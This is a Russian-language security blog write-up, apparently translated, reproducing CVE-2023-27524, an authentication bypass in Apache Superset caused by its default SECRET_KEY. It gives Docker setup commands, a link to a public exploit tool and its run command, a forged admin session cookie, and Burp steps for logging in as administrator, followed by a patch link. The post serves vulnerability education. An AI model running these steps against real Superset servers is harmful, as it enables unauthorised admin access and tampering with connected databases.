Подпишитесь на нас ❤️, добавьте звездочку 🌟 и учитесь безопасности вместе! Автор: Locks_@Timeline Sec Количество слов в статье: 2730. Время чтения: 3~5 минут Заявление: Это только для ознакомления, пожалуйста, не используйте его в незаконных целях, в противном случае вы будете нести ответственность за последствия.

0x01 Введение

Apache Superset — это платформа визуализации и исследования данных с открытым исходным кодом, построенная на Python и использующая некоторые веб-фреймворки Python, подобные Django и Flask. Предоставляет удобный интерфейс для легкого создания и совместного использования информационных панелей, запросов и визуализации данных, а также интеграции в другие приложения.

0x02 Обзор уязвимостей

Номер уязвимости: CVE-2023-27524. Apache Уязвимость обхода аутентификации в Superset (CVE-2023-27524). Спасибо Апачу Superset имеет небезопасную конфигурацию по умолчанию. Системы, которые не меняют SECRET_KEY по умолчанию в соответствии с инструкциями по установке, подвержены этой уязвимости. Не прошедший проверку подлинности удаленный злоумышленник может использовать эту уязвимость для доступа к неавторизованным ресурсам или выполнения вредоносного кода.

0x03 Затронутая версия

Apache Superset <= 2.0.1

0x04 Настройка среды

Настройка Вы можете использовать Docker для его сборки здесь, ссылка

https://superset.apache.org/docs/installation/installing-superset-using-docker-compose/#3-launch-superset-through-docker-compose

curl -L https://github.com/docker/compose/releases/download/1.29.1/docker-compose-`uname -s`-`uname -m` > /usr/local/bin/docker-compose

git clone https://github.com/apache/superset.git

cd superset

git checkout 2.0.0

TAG=2.0.0 docker-compose -f docker-compose-non-dev.yml pull

TAG=2.0.0 docker-compose -f docker-compose-non-dev.yml up

0x05 Повторение уязвимости

Apache Superset написан на основе веб-фреймворка flask на Python. Flask — это облегченный веб-фреймворк Python, и его сеанс хранится в поле cookie на клиенте. Чтобы предотвратить подделку сеанса, flask выполняет следующую обработку (код хранится в файле session.py в модуле flask):

"""The default session interface that stores sessions in signed cookies
through the :mod:`itsdangerous` module.
"""

#: the salt that should be applied on top of the secret key for the
#: signing of cookie based sessions.
salt = "cookie-session"
#: the hash function to use for the signature. The default is sha1
digest_method = staticmethod(hashlib.sha1)
#: the name of the itsdangerous supported key derivation. The default
#: is hmac.
key_derivation = "hmac"
#: A python serializer for the payload. The default is a compact
#: JSON derived serializer with support for some extra Python types
#: such as datetime objects or tuples.
serializer = session_json_serializer
session_class = SecureCookieSession

def get_signing_serializer(self, app):
if not app.secret_key:
return None
signer_kwargs = dict(
key_derivation=self.key_derivation, digest_method=self.digest_method
)
return URLSafeTimedSerializer(
app.secret_key,
salt=self.salt,
serializer=self.serializer,
signer_kwargs=signer_kwargs,
)
……
……

Используйте адрес загрузки инструмента эксплуатации уязвимостей:

https://github.com/horizon3ai/CVE-2023-27524

После скачивания разархивируйте и введите Выполнить локальную команду pip3 install -r .\requirements.txt

После выполнения команды появится файл cookie. python.exe .\CVE-2023-27524.py -u http://xx.xx.xx.xx:8088/ --validate

Злоумышленник может использовать взорванный ключ для подделки файла cookie сеанса со значением user_id, равным 1, и войти в систему как администратор. Установка поддельного файла cookie сеанса в локальном хранилище браузера и обновление страницы позволяет злоумышленнику получить доступ к приложению от имени администратора. Интерфейс SQL Lab позволяет злоумышленникам запускать произвольные операторы SQL к подключенной базе данных. В зависимости от прав пользователя базы данных злоумышленник может запрашивать, изменять и удалять любые данные в базе данных, а также выполнять удаленный код на сервере базы данных.

eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZHmZZg._EDUdrG5oZ3sGiPriNIV94fjzQw

Используйте Burp для перехвата пакетов запросов

Это GET, а это значит, что вам не нужно входить в систему, просто обновите и получите.

Затем замените файл cookie и отправьте его.

Успешный вход на внутреннюю страницу

Успешно войдите в систему управления Apache Superset, где вы сможете выполнять некоторые операторы SQL и другие операции (просто докажите, что это вредно, не выполняйте операторы SQL по своему желанию, чтобы подделать данные).

0x06 Метод восстановления

В настоящее время производитель выпустил обновление для устранения уязвимости. Ссылка для получения исправления: https://lists.apache.org/thread/n0ftx60sllf527j7g11kmt24wvof8xyk.

Справочная ссылка

https://blog.csdn.net/weixin_46944519/article/details/130483576

Исторические дыры

Пока нет